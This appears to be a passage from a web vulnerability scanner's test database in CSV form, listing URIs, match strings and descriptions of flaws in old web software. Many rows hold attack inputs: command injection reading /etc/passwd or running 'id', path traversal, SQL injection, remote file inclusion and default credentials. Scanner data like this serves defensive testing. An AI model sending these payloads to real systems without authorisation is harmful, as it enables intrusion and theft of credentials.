"000983","0","3","@CGIDIRSWS_FTP.ini","GET","200","","","","","Can contain saved passwords for ftp sites","",""
"000984","713","3","/?sql_debug=1","GET","SQL query: ","","","","","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.","",""
"000985","0","3","/a_security.htm","GET","name=\"viewingpasswrd\" value=","","","","","Polycom ViewStation FX Release v4.2 reveals the admin password in the change password form's HTML.","",""
"000986","0","3","/Admin_files/order.log","GET","200","","","","","Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt.","",""
"000987","59092","3","/admin.html","GET","MySimpleNews - Administration","","","","","MySimpleNews contains the admin password in the login page HTML."," ",""
"000988","0","3","/admin/cplogfile.log","GET","200","","","","","DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version.","",""
"000989","0","3","/admin/system_footer.php","GET","200","","","","","myphpnuke version 1.8.8_final_7 reveals detailed system information.","",""
"000990","0","3","/cfdocs/snippets/fileexists.cfm","GET","200","","","","","Can be used to verify the existance of files (on the same drive info as the web tree/file)","",""
"000991","0","3","/cgi-bin/MachineInfo","GET","200","","","","","Gives out information on the machine (IRIX), including hostname","",""
"000992","59646","3","/chat/!nicks.txt","GET","200","","","","","WF-Chat 1.0 Beta allows retrieval of user information.","",""
"000993","59645","3","/chat/!pwds.txt","GET","200","","","","","WF-Chat 1.0 Beta allows retrieval of user information.","",""
"000994","53304","3","/chat/data/usr","GET","200","","","","","SimpleChat! 1.3 allows retrieval of user information.","",""
"000995","0","3","/com","GET","[Ii]ndex [Oo]f ","","","","","Java class files may be browsable.","",""
"000996","0","3","/COM","GET","[Ii]ndex [Oo]f ","","","","","Java class files may be browsable.","",""
"000997","0","3","/config.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","",""
"000998","0","3","/config/","GET","200","","","","","Configuration information may be available remotely.","",""
"000999","0","3","/cplogfile.log","GET","200","","","","","XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.","",""
"001000","2880","3","/cutenews/index.php?debug","GET","PHP Version","","","","","Cutenews 1.3 contains an information disclosure bug that reveals standard 'phpinfo' page output.","",""
"001001","0","3","/examples/jsp/snp/anything.snp","GET","200","","","","","Tomcat servlet gives lots of host information."," ",""
"001002","0","3","/file-that-is-not-real-2002.php3","GET","Unable to open","","","","","PHP is configured to show the web root when sending error messages. Set display_errors to 'off'.","",""
"001003","0","3","/index.php?sql_debug=1","GET","SQL query: ","","","","","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.","",""
"001004","0","37","@CGIDIRSview-source?view-source","GET","200","","","","","This allows remote users to view source code.","",""
"001005","0","37","@CGIDIRSwebplus?about","GET","Product Information","","","","","Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability.","",""
"001006","0","37","/cfdocs/snippets/viewexample.cfm","GET","200","","not found","","","This can be used to view .cfm files, request viewexample.cfm?Tagname=..\..\..\file  (.cfm is assumed)","",""
"001007","0","3a","/chassis/config/GeneralChassisConfig.html","GET","Chassis Configuration","","","","","The Cabletron switch may allow remote configuration, or data retrieval, through the web interface.","",""
"001008","13978","3b","@CGIDIRSibill.pm","GET","200","","","","","iBill.pm is installed. This may allow brute forcing of passwords.","",""
"001009","9332","3b","@CGIDIRSscoadminreg.cgi","GET","200","","","","","This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.","",""
"001010","4663","3b","@CGIDIRSSGB_DIR/superguestconfig","GET","200","","","","","Super GuestBook 1.0 from lasource.r2.ru stores the admin password in a plain text file.","",""
"001011","0","4","/hp/device/this.LCDispatcher","GET","Printer Serial Number","","","","","The Hewlett Packard Color LaserJet 4550 may allow unauthenticated users to permanently include links (and other data) in the web interface.","",""
"001012","0","6","/cfdocs/snippets/evaluate.cfm","GET","200","","","","","Can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info","",""
"001013","0","6","/cfide/Administrator/startstop.html","GET","200","","","","","Can start/stop the server","",""
"001014","0","7","@CGIDIRSicat","GET","200","","","","","Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.","",""
"001015","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","Failed to read the maskfile","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","",""
"001016","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.0","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","",""
"001017","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.1","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","",""
"001018","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.2","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","",""
"001019","11871","7","@CGIDIRSMsmMask.exe?mask=/junk334","GET","MondoSearch for Web Sites 4\.3","","","","","MondoSearch may allow any file to be retrieved using the 'mask' variable.","",""
"001020","0","7","@CGIDIRSnph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0","GET","200","","","","","nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug","",""
"001021","0","7","@CGIDIRSquery?mss=%2e%2e/config","GET","MGMT_PW","","","","","The Altavista search service allows attackers to read any file on the server.","",""
"001022","0","7","@CGIDIRStest-cgi?/*","GET","\/tmp","","","","","This CGI allows files to read remotely.","",""
"001023","6192","7","@CGIDIRSupdate.dpgs","GET","200","","","","","Duma Photo Gallery System may allow remote users to write to any file on the system. See http://b0iler.eyeonsecurity.net for details. This could not be remotely tested.","",""
"001024","0","7","@CGIDIRSview-source","GET","200","","","","","This may allow remote arbitrary file retrieval.","",""
"001025","0","7","@CGIDIRSwrap","GET","200","","","","","This CGI lets users read any file with 755 perms. It should not be in the CGI directory.","",""
"001026","0","7","/Mem/dynaform/FileExplorer.htm","GET","File Explorer","","","","","The Nortel MIRAN device allows unauthenticated users to view the contents of the system's drive.","",""
"001027","0","78","@CGIDIRSFormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com","GET","root:","","","","","This CGI allows attackers to read files and execute commands remotely.","",""
"001028","0","78","@CGIDIRSlastlines.cgi?process","POST","root:","","","","","This CGI lets attackers read arbitrary files and/or execute commands.","num_lines=1000&log_location=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",""
"001029","405","8","@CGIDIRScalendar_admin.pl?config=|cat%20/etc/passwd|","GET","root:","","","","","This CGI allows attackers to execute commands on the server.","",""
"001030","405","8","@CGIDIRScalendar/calendar_admin.pl?config=|cat%20/etc/passwd|","GET","root:","","","","","This CGI allows attackers to execute commands on the server.","",""
"001031","29","8","@CGIDIRScampas?%0acat%0a/etc/passwd%0a","GET","root:","","","","","NCSA campas allows attackers to execute commands on the server.","",""
"001032","650","8","@CGIDIRScgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","CGIEmail's cgicso allows attackers to execute remote commands.","",""
"001033","0","8","@CGIDIRScgiwrap","GET","200","","","","","Some versions of cgiwrap allow anyone to execute commands remotely."," ",""
"001034","640","8","@CGIDIRScommon/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|","GET","resolv\.conf","","","","","Allows attacker to execute commands as http daemon. Upgrade or remove.","",""
"001035","0","8","@CGIDIRSCount.cgi","GET","200","","","","","This may allow attackers to execute arbitrary commands on the server","",""
"001036","59544","8","@CGIDIRScsChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","GET","root:","","","","","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.","",""
"001037","59542","8","@CGIDIRScsGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","GET","root:","","","","","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.","",""
"001038","59543","8","@CGIDIRScsLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","GET","root:","","","","","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.","",""
"001039","59545","8","@CGIDIRScsNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')","GET","root:","","","","","Multiple scripts from CGIscript.net have remote code execution vulnerabilities. Upgrade to the latest version.","",""
"001040","0","8","@CGIDIRSecho.bat","GET","200","","","","","This CGI may allow attackers to execute remote commands.","",""
"001041","0","8","@CGIDIRSformmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","",""
"001042","4571","8","@CGIDIRSImageFolio/admin/admin.cgi","GET","200","","","","","ImageFolio (default accout Admin/ImageFolio) may allow files to be deleted via URLs like: ?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/","",""
"001043","101","8","@CGIDIRSinfo2www '(../../../../../../../bin/mail root </etc/passwd>","GET","root:","","","","","This CGI allows attackers to execute commands. passwd file may have been mailed to root.","",""
"001044","0","8","@CGIDIRSinfo2www","GET","200","","","","","This CGI allows attackers to execute commands.","",""
"001045","0","8","@CGIDIRSinfosrch.cgi","GET","200","","","","","This CGI allows attackers to execute commands.","",""
"001046","0","8","@CGIDIRSlistrec.pl","GET","200","","","","","This CGI allows attackers to execute commands on the host.","",""
"001047","0","8","@CGIDIRSmailnews.cgi","GET","200","","","","","Some versions allow attacker to execute commands as http daemon. Upgrade or remove.","",""
"001048","0","8","@CGIDIRSmmstdod.cgi","GET","200","","","","","May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.","",""
"001049","0","8","@CGIDIRSpagelog.cgi","GET","200","","","","","Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.","",""
"001050","0","8","@CGIDIRSperl?-v","GET","200","","","","","Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.","",""
"001051","0","8","@CGIDIRSperl.exe?-v","GET","200","","","","","Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.","",""
"001052","0","8","@CGIDIRSperl.exe","GET","200","","","","","Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.","",""
"001053","0","8","@CGIDIRSperl","GET","200","","","","","Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.","",""
"001054","0","8","@CGIDIRSplusmail","GET","200","","","","","This CGI may allow attackers to execute commands remotely.","",""
"001055","10944","8","@CGIDIRSscripts/slxweb.dll/getfile?type=Library&file=[invalid filename]","GET","200","","","","","SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.","",""
"001056","0","8","@CGIDIRSsmartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|","GET","200","root:","","","","To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command","",""
"001057","0","8","@CGIDIRSsmartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|","GET","200","root:","","","","To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command","",""
"001058","54034","8","@CGIDIRSspin_client.cgi?aaaaaaaa","GET","200","","","","","This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)","",""
"001059","10598","8","@CGIDIRSsscd_suncourier.pl","GET","200","","","","","Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.","",""
"001060","13981","8","@CGIDIRSviralator.cgi","GET","200","","","","","May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.","",""
"001061","4854","8","@CGIDIRSvirgil.cgi","GET","200","","","","","The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.","",""
"001062","2088","8","@CGIDIRSvpasswd.cgi","GET","200","","","","","Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.","",""
"001063","236","8","@CGIDIRSwebgais","GET","200","","","","","The webgais allows attackers to execute commands.","",""
"001064","237","8","@CGIDIRSwebsendmail","GET","200","","","","","This CGI may allow attackers to execute arbitrary commands remotely.","",""
"001065","0","8","@CGIDIRSwhois.cgi?action=load&whois=%3Bid","GET","uid=","","","","","This script allows commands to be executed remotely.","",""
"001066","0","8","@CGIDIRSwwwwais","GET","200","","","","","wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.","",""
"001067","10598","8","/cd-cgi/sscd_suncourier.pl","GET","200","","","","","Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.","",""
"001068","0","8","@CGIDIRScommon/listrec.pl","GET","200","","","","","This CGI allows attackers to execute commands on the host.","",""
"001069","0","8","/cgi-bin/handler","GET","200","","","","","Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands","",""
"001070","0","8","/cgi-bin/handler/netsonar;cat /etc/passwd|?data=Download","GET","root:","","","","","Comes with IRIX 5.3 - 6.4; allows to run arbitrary commands","",""
"001071","235","8","/cgi-bin/webdist.cgi","GET","200","","","","","Comes with IRIX 5.0 - 6.3; allows to run arbitrary commands","",""
"001072","14485","8","/DB4Web/10.10.10.10:100","GET","connect\(\)","","","","","The remote DB4Web server may allow you to connect to arbitrary machines and ports.","",""
"001073","55","8","/ews/ews/architext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665.","",""
"001074","0","8","/exec/show/config/cr","GET","ip address","","","","","The Cisco router's web install allows arbitrary commands to be executed remotely.","",""
"001075","5280","8","/instantwebmail/message.php","GET","200","","","","","Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email.","",""
"001076","0","38","/cfdocs/snippets/gettempdirectory.cfm","GET","200","","not found","","","Depending on install, creates files, gives you physical drive info, sometimes defaults to \winnt\ directory as temp directory","",""
"001077","59031","48","@CGIDIRSstat.pl","GET","200","","","","","Uninets StatsPlus 1.25 from http://www.uninetsolutions.com/stats.html may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER.","",""
"001078","28","a","@CGIDIRScachemgr.cgi","GET","200","","","","","Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.","",""
"001079","142","a","@CGIDIRSppdscgi.exe","GET","200","","","","","PowerPlay Web Edition may allow unauthenticated users to view pages.","",""
"001080","0","a","@CGIDIRSsws/admin.html","GET","manager\.pl","","","","","Stepweb.com SWS search engine admin page is available. You may be able to change admin information without authentication.","",""
"001081","0","a","@CGIDIRSwebif.cgi","GET","200","","","","","HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.","",""
"001082","29786","a","/admin.php?en_log_id=0&action=config","GET","200","","","","","EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.","",""
"001083","29786","a","/admin.php?en_log_id=0&action=users","GET","200","","","","","EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.","",""
"001084","0","a","/admin.php4?reg_login=1","GET","200","","","","","Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.","",""
"001085","3233","a","/admin/admin_phpinfo.php4","GET","200","","","","","Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.","",""
"001086","5034","a","/admin/login.php?action=insert&username=test&password=test","GET","200","","","","","phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.","",""
"001087","0","a","@CGIDIRS.cobalt/siteUserMod/siteUserMod.cgi","GET","200","","","","","Older versions of this CGI allow any user to change the administrator password.","",""
"001088","607","a","/interscan/cgi-bin/FtpSave.dll?I'm%20Here","GET","These settings have been saved","","","","","Multiple files in the Interscan management server allow attackers to change settings without auth. Upgrade to the latest version of the Interscan product.","",""
"001089","8610","7a","/ext.ini.%00.txt","GET","\[SERVICES\]","","","","","BadBlue allows access restrictions to be bypassed by using a null byte.","",""
"001090","0","8a","@CGIDIRSwebdriver","GET","200","","","","","This CGI often allows anyone to access the Informix DB on the host.","",""
"001091","5178","8a","/dostuff.php?action=modify_user","GET","200","","","","","Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/","",""
"001092","0","ab","@CGIDIRSc32web.exe/ChangeAdminPassword","GET","200","","","","","This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.","",""
"001093","5088","ab","/accounts/getuserdesc.asp","GET","200","","","","","Hosting Controller 2002 administration page is available. This should be protected.","",""
"001094","0","b","@CGIDIRScgi-lib.pl","GET","200","","","","","CGI Library. If retrieved check to see if it is outdated, it may have vulns","",""
"001095","0","b","@CGIDIRSlog/nether-log.pl?checkit","GET","200","","","","","Default Pass: nethernet-rules","",""
"001096","0","b","@CGIDIRSmini_logger.cgi","GET","200","","","","","Default password: guest","",""
"001097","0","b","@CGIDIRSmt-static/","GET","200","","","","","Movable Type weblog found. May contain security problems in CGIs, weak passwords, and more. Default login 'Melody' with password 'Nelson'.","",""
"001098","0","b","@CGIDIRSmt/","GET","200","","","","","Movable Type weblog found. May contain security problems in CGIs, weak passwords, and more. Default login 'Melody' with password 'Nelson'.","",""
"001099","0","b","@CGIDIRSnimages.php","GET","200","","","","","Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.","",""
"001100","0","b","@CGIDIRSrobadmin.cgi","GET","200","","","","","Default password: roblog","",""
"001101","0","b","/Admin/","GET","CobaltServer","","","","","The web server is the CobaltRaq administrator. If password protection is broken, attackers will have access to admin your server. Use tcpwrappers or shut this down for safety.","",""
"001102","0","0b","@CGIDIRSnetpad.cgi","GET","200","","","","","netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.","",""
"001103","0","1b","@CGIDIRStroops.cgi","GET","200","","","","","This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.","",""
"001104","0","1b","@CGIDIRSunlg1.1","GET","200","","","","","web backdoor by ULG","",""
"001105","0","1b","@CGIDIRSunlg1.2","GET","200","","","","","web backdoor by ULG","",""
"001106","0","8b","@CGIDIRSrwwwshell.pl","GET","200","","","","","THC reverse www shell","",""
"001107","0","ab","@CGIDIRSphoto/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","",""
"001109","14538","c","/achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","Achievo can be made to include PHP files from another domain. Upgrade to a new version.","",""
"001110","35876","9","/agentadmin.php","GET","200","","","","","Immobilier agentadmin.php contains multiple SQL injection vulnerabilities.","",""
"001111","50530","c","/b2-include/b2edit.showposts.php?b2inc=@RFIURL&cmd=ls","GET","PHP Version","","","","","B2 (cafelog.com) are vulnerable to remote inclusion by redefining $b2inc to a remote PHP file. Upgrade to a version higher than b2.06pre2. This vulnerability could not be confirmed.","",""
"001112","7377","c","/catalog/includes/include_once.php?include_file=@RFIURL","GET","PHP Version","","","","","phpWebSite or osCommerce may allow inclusion of remote scripts.","",""
"001113","35388","c","/errors/needinit.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","Gallery 1.3.0 and below allow PHP files to be included from another domain. Upgrade to the latest version.","",""
"001114","0","13","/sqldump.sql","GET","200","","","","","Database SQL?","",""
"001115","0","13","/structure.sql","GET","200","","","","","Database SQL?","",""
"001116","0","2","/servlet/SessionManager","GET","200","Error Occurred","","","","IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.","",""
"001117","0","23","/php.ini","GET","\[PHP\]","","","","","This file should not be available through the web interface.","",""
"001118","0","2a","/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator","GET","Event Log","","","","","SiteScope service has no password set. Restrict by IP and set a password.","",""
"001119","0","3","/ip.txt","GET","200","","","","","This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.","",""
"001120","15301","3","/JUNK(6).cfm?mode=debug","GET","Execution Time","","","","","ColdFusion debug information contains sensitive information and can be viewed by appending ?Mode=debug at the end of the request.","",""
"001121","0","3","/level/42/exec/show%20conf","GET","200","","","","","Retrieved Cisco configuration file.","",""
"001122","0","3","/livehelp/","GET","200","","","","","LiveHelp may reveal system information.","",""
"001123","0","3","/LiveHelp/","GET","200","","","","","LiveHelp may reveal system information.","",""
"001124","59536","3","/logicworks.ini","GET","200","","","","","web-erp 0.1.4 and earlier allow .ini files to be read remotely.","",""
"001125","0","3","/login.jsp","GET","replace\(\"https:\\\/\\\/10","","","","","HP Insight Manager reveals internal IP addresses in the HTML page.","",""
"001126","0","3","/logins.html","GET","Below are the usernames and passwords","","","","","The Divine/OpenMarket Content Server lists the default user names and passwords set up with the server.","",""
"001127","0","3","/logs/str_err.log","GET","200","","","","","Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).","",""
"001128","6465","3","/mall_log_files/order.log","GET","200","","","","","EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details.","",""
"001129","3233","3","/mambo/administrator/phpinfo.php","GET","PHP Version","","","","","Mambo Site Server 4.0.11 phpinfo.php script reveals system information.","",""
"001130","3204","3","/megabook/files/20/setup.db","GET","200","","","","","Megabook guestbook configuration available remotely.","",""
"001131","35878","9","/modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'a%25'/*","GET","Admin","","","cannot be found","","PHP-Nuke module allows user names and passwords to be viewed.","",""
"001132","0","3","/modules.php?name=Members_List&sql_debug=1","GET","SQL query: ","","","","","The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.","",""
"001133","0","3","/myinvoicer/config.inc","GET","System settings","","","","","MyInvoicer prior to 1.0.2 allowed remote user to read source of config file, possibly leaking sensitive information or passwords.","",""
"001134","6161","3","/officescan/hotdownload/ofscan.ini","GET","200","","","","","OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords.","",""
"001135","0","3","/order/order_log_v12.dat","GET","200","","","","","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt","",""
"001136","0","3","/order/order_log.dat","GET","200","","","","","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt","",""
"001137","0","3","/orders/order_log_v12.dat","GET","200","","","","","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt","",""
"001138","0","3","/Orders/order_log_v12.dat","GET","200","","","","","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt","",""
"001139","0","3","/orders/order_log.dat","GET","200","","","","","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt","",""
"001140","0","3","/Orders/order_log.dat","GET","200","","","","","Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt","",""
"001141","0","3","/PDG_Cart/shopper.conf","GET","Authnet_Login","","","","","PDGSoft's PDG Shopping Cart 1.5 http://www.pdgsoft.com/ , Shopping cart software log, http://www.mindsec.com/advisories/post2.txt","",""
"001142","11140","3","/phorum/admin/stats.php","GET","Phorum Stats","","","","","PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it.","",""
"001143","2809","3","/php-coolfile/action.php?action=edit&file=config.php","GET","pass_1","","","","","PHP-Coolfile 1.4 may allow any user to read the config.php file.","",""
"001144","3233","3","/phpBB/phpinfo.php","GET","PHP Version","","","","","phpBBmod contains an enhanced version of the phpinfo.php script. This should be removed as it contains detailed system information.","",""
"001145","3233","3","/phpinfo.php","GET","PHP Version","","","","","Contains PHP configuration information","",""
"001146","3233","3","/phpinfo.php3","GET","PHP Version","","","","","Contains PHP configuration information","",""
"001147","0","3","/pmlite.php","GET","200","","","","","A Xoops CMS script was found. Version RC3 and below allows all users to view all messages (untested). See http://www.phpsecure.org/?zone=pComment&d=101 for details."," ",""
"001148","0","3","/session/admnlogin","GET","200","Error Occurred","","","","SessionServlet Output, has session cookie info.","",""
"001149","6560","3","/settings/site.ini","GET","DatabaseSettings","","","","","eZ publish v3 and prior allow site setup code to be viewed remotely.","",""
"001150","613","3","/SiteScope/htdocs/SiteScope.html","GET","200","","","","","The SiteScope install may allow remote users to get sensitive information about the hosts being monitored.","",""
"001151","0","3","/soapdocs/ReleaseNotes.html","GET","Oracle SOAP","","","","","Default Oracle SOAP documentation found.","",""
"001152","0","3","/ssdefs/siteseed.dtd","GET","imagesDir=\"","","","","","Siteseed pre 1.4.2 has 'major' security problems, and this dtd file reveals the web root.","",""
"001153","0","35","/servlet/allaire.jrun.ssi.SSIFilter","GET","200","Error Occurred","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call, see MPSB01-12 http://www.macromedia.com/devnet/security/security_zone/mpsb01-12.html.","<!--#include virtual=\"/index.jsp\"-->",""
"001154","2881","3a","/pp.php?action=login","GET","200","","","","","Pieterpost 0.10.6 allows anyone to access the 'virtual' account which can be used to relay/send e-mail.","",""
"001155","0","6","/isapi/count.pl?","GET","200","","","","","AN HTTPd default script may allow writing over arbitrary files with a new content of '1', which could allow a trivial DoS. Append /../../../../../ctr.dll to replace this file's contents, for example.","",""
"001156","0","7","/krysalis/","GET","200","","","","","Krysalis pre 1.0.3 may allow remote users to read arbitrary files outside docroot","",""
"001157","0","8","/logjam/showhits.php","GET","200","","","","","Logjam may possibly allow remote command execution via showhits.php page.","",""
"001158","0","8","/manual.php","GET","200","","","","","Does not filter input before passing to shell command. Try 'ls -l' as the man page entry.","",""
"001159","16748","8","/mods/apage/apage.cgi?f=file.htm.|id|","GET","uid=0","","","","","WebAPP Apage.CGI remote command execution. BID-13637","",""
"001160","0","8","/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","",""
"001161","0","8","/nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","",""
"001162","0","8","/perl/-e%20%22system('cat%20/etc/passwd');\%22","GET","root:","","","","","The installed Perl interpreter allows any command to be executed remotely.","",""
"001163","0","8","/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","",""
"001164","0","8","/phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","GET","uid=","","","","","PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version.","",""
"001165","0","8","/Program%20Files/","GET","WindowsUpdate","","","","","This check (B) uses the blue test (A) for possible exploit. see  http://www.badblue.com/down.htm.","",""
"001166","14329","8","/smssend.php","GET","200","","","","","PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php","",""
"001167","0","8a","/pls/simpledad/admin_/dadentries.htm","GET","Add Database Access","","","","","Oracle admin script allows modification of database information.","",""
"001168","0","a","/Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000","POST","Login as Admin successful","","","","","Meridian Integrated Recorded Announcer default account admin/admin000 enabled","",""
"001169","113","a","/ncl_items.html","GET","200","","","","","This may allow attackers to reconfigure your Tektronix printer.","",""
"001170","551","a","/ncl_items.shtml?SUBJECT=1","GET","200","","","","","This may allow attackers to reconfigure your Tektronix printer.","",""
"001171","0","a","/photo/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","",""
"001172","0","a","/photodata/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more.","",""
"001174","5374","a","/pub/english.cgi?op=rmail","GET","200","","","","","BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely.","",""
"001175","0","a","/pvote/ch_info.php?newpass=password&confirm=password%20","GET","200","","","","","PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password.","",""
"001176","240","a","/scripts/wsisa.dll/WService=anything?WSMadmin","GET","200","","","","","Allows Webspeed to be remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0.","",""
"001177","3092","a","/SetSecurity.shm","GET","200","","","","","Cisco System's My Access for Wireless. This resource should be password protected.","",""
"001178","3126","a","/submit?setoption=q&option=allowed_ips&value=255.255.255.255","GET","200","","","","","MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.","",""
"001179","2225","a","/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin","GET","200","","","","","paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.","",""
